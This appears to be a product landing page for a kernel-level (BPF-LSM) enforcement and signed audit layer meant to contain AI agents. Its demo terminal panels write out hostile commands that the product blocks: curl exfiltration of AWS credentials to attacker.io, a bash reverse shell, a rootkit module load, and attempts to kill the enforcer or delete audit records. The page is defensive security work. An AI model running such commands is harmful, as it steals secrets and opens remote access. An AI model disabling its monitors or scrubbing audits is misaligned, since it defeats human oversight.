EBPF · BPF-LSM RUNTIME SECURITY FOR AI AGENTS

Rogue agents can't escape the kernel.

The independent in-kernel enforcement & audit-of-record layer for AI agents — the only one that guards its own off-switch and ships an audit even root can't scrub.

ENFORCE in-kernel HOLD + PROVE

Watch your language!

Every command an agent speaks is read at the syscall — and ruled before it runs.

OKNEK chrome aperture lens on an AI agent host dashboard — kernel-level enforcement
root@agent-host — oknekd · enforce 6 escape attempts · 6 stopped
root@agent-host:/# rm /sys/fs/bpf/oknek/lsm_file_open
rm: cannot remove '…/lsm_file_open': Operation not permitted
root@agent-host:/# kill -9 $(pidof oknekd) # kill the enforcer itself
DEFEATED · daemon dies, kernel enforcement persists — pins survive, rm still EPERM
root@agent-host:/# curl -T ~/.aws/credentials https://attacker.io/x
BLOCKED · egress jail (R11) · destination not in allowlist
root@agent-host:/# aws s3api delete-object --version-id … oknek-audit/anchor
AccessDenied · Object-Lock · HTTP 403
root@agent-host:/# insmod /tmp/rootkit.ko # hide the agent
BLOCKED · kernel module load denied · LSM (R18)
root@agent-host:/# bash -i >& /dev/tcp/attacker.io/4444 0>&1
BLOCKED · egress jail (R11) · reverse shell denied
root@agent-host:/#
6/ 6

Every escape attempt fails — denied at the syscall, or defeated by persistence.

rm → EPERMkill → persists exfil → BLOCKEDDELETE → 403 module → DENIEDrev-shell → BLOCKED
verified on real BPF-LSM hardware · 2026-06-30
01

Three guarantees, below the agent.

The agent runs in userspace. Oknek runs in the kernel — where the operator it runs under can't quietly turn it off or rewrite what it saw.

PILLAR · 01

Enforce

In-kernel default-deny

Every syscall the agent makes hits a BPF-LSM hook first. Not on the allowlist → EPERM, before it runs. Watched agents are also denied kernel-module loads (R18) and setuid escalation (R15).

PILLAR · 02

Hold

Enforcer root can't switch off

R20 pins the hooks: root rm, mv, umount and map-write all return EPERM — and killing the daemon just leaves the kernel enforcement running. The off-switch guards itself.

PILLAR · 03

Prove

Audit root can't scrub

Okular: hash-chained, ed25519-signed, immutable Object-Lock. A locked version's DELETE returns 403.

02

The off-switch that guards itself.

Root owns the box and still can't disarm the enforcer. Every disable path is hooked and denied — and killing the daemon just leaves the kernel enforcement running.

R20 · ANTI-UNPIN root tries to disable 5 / 5 DEFEATED
root@host# rm /sys/fs/bpf/oknek/lsm_*
→ EPERM · rm hook
root@host# mv oknekd /tmp/x
→ EPERM · rename hook
root@host# umount /sys/fs/bpf
→ EPERM · sb_umount hook
root@host# bpftool map update … freeze
→ EPERM · map-write frozen / RDONLY
root@host# kill -9 $(pidof oknekd)
→ daemon dies · enforcement persists (pins survive)
rm → EPERMmv → EPERM umount → EPERMkill → persists
HONEST LIMIT out-of-band ≠ silent

No absolute claims. A reboot or a kernel exploit is out-of-band — and it doesn't go quiet.

in-bandrm / mv / map-write / umount denied · kill → enforcement persistsHELD
out-bandreboot · kernel exploitDETECTED

A gap in the audit chain is itself the alarm. You can break Oknek — you can't do it quietly.

See the full denial matrix →
03

An audit even root can't rewrite.

Okular hash-chains every verdict, ed25519-signs each anchor, and parks it under Object-Lock. Delete a locked version → 403.

OKULAR · LEDGER hash-chained anchors CHAIN INTACT
#4471a3f1…b2 ← 7e09…cced25519 ✓
#44729c2d…1f ← a3f1…b2ed25519 ✓
#44735b8a…04 ← 9c2d…1fed25519 ✓
#4474e10f…7d ← 5b8a…04ed25519 ✓
# verifier: fail-CLOSED on gap, delete-marker, missing-ts
OBJECT-LOCK · WORM root tries to scrub DENIED
root@host# aws s3api delete-object \
--version-id a3f1b2c4… s3://oknek-audit/anchor
An error occurred (AccessDenied)
Object-Lock in COMPLIANCE mode · HTTP 403
root@host# aws s3api list-object-versions …
# delete-marker enum → recovered, fail-CLOSED
DELETE → 403 off-box WORM escrow
Verify a chain yourself →
04

Oknek vs. the field.

Every other tool is a daemon root owns — mute it, unload it, edit the log. Three rows nobody else can fill.

Capability Oknek Detection / EDR Userspace guardrails
Stops the action before it runs Enforce · in-kernel Detect after Advisory
Survives its own root operator Self-guarding · R20 root-removable root-removable
Ships an audit root can't scrub WORM · DELETE → 403 tamperable log tamperable log
Scoped to autonomous agents Agent-native policy Host-generic Prompt-layer

Run Tetragon for your workloads. Run Oknek for the thing making autonomous decisions on top of them.

05

Ship policy in an afternoon.

Start in observe, watch the verdicts, flip to enforce. Three templates cover the agents most teams run first.

01 · coding-agentRCE · supply-chain

Coding agent

No egress, no shell-out beyond the repo sandbox.

observeenforce
02 · browser-agentexfil · credential

Browser agent

Egress allowlist only; creds files unreadable.

observeenforce
03 · cx-agentdata · pivot

CX agent

Pinned APIs, no lateral host or socket pivot.

observeenforce
06

Safe to adopt, safe to leave.

Observe-first means zero surprise denials. The pins you arm on purpose are the pins you disarm on purpose.

01
Observe-firstRun silent. Every would-be denial logged, nothing blocked.
02
Flip to enforcePromote a template per-agent once the verdicts look right.
03
Clean uninstallGated-disarm from the SB lane unloads every hook. No residue.

The pin is intentional.

R20 holds against a rogue root mid-run. Adoption is gated-disarm from the SB lane — you stay in control of arming and removing it.

observe → enforce gated-disarm no residue
PILOT PROGRAM · LIMITED

Put the enforcer below your agent.

One host, one agent, observe-first. See the verdicts on your own workload before you arm a single pin.

Verified on real BPF-LSM hardware · 2026-06-30